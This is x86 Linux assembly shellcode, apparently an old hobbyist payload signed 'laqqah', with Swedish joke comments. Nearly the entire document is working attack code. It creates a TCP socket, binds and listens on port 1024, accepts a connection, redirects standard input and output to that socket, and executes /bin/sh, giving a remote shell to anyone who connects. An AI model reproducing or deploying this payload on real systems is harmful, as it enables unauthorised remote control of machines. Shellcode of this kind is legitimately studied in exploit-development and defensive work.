# binds a shell on port 1024 - by laqqah
# see ya at hultsfred & roskilde festivals 2000.
# din mamma dr en brevleda!

.global _start
_start:
xor %eax, %eax
movb $102, %al
mov %eax, %esi          # socketcall

xor %eax, %eax
push %eax               # IPPROTO_TCP
inc %eax
push %eax               # SOCK_STREAM
inc %eax
push %eax               # AF_INET
mov %esp, %ecx          # for sys_socket

xor %ebx, %ebx
xor %edx, %edx
movb $16, %dl
push %ebx               # INADDR_ANY

rcl $17, %eax           # PORT = 1024, FAMILY = 0 (skitsamma)
push %eax

mov %esp, %edi
push %edx               # sizeof(struct sockaddr_in)
push %edi               # (struct sockaddr_in *)

# sys_socket
mov %esi, %eax
inc %ebx
int $0x80
push %eax               # socket

# sys_bind
mov %esi, %eax
inc %ebx
mov %esp, %ecx
int $0x80

# sys_listen
mov %esi, %eax
inc %ebx
inc %ebx
int $0x80

# sys_accept
mov %esi, %eax
inc %ebx
int $0x80
push %eax               # accepted socket

# dup2
pop %ebx
xor %ecx, %ecx
inc %ecx
movb $63, %al
int $0x80
movb $63, %al
dec %ecx
int $0x80

# exec shell
jmp 1f
2:
pop %ebx        # "/bin/sh"
push %eax
movb %al, 7(%ebx)
movb $11, %al
mov %esp, %edx
push %ebx
mov %esp, %ecx
int $0x80

.ifdef SAFE
xor %eax, %eax
inc %eax
int $0x80
.endif  # SAFE

1:
call 2b
.ascii "/bin/sh"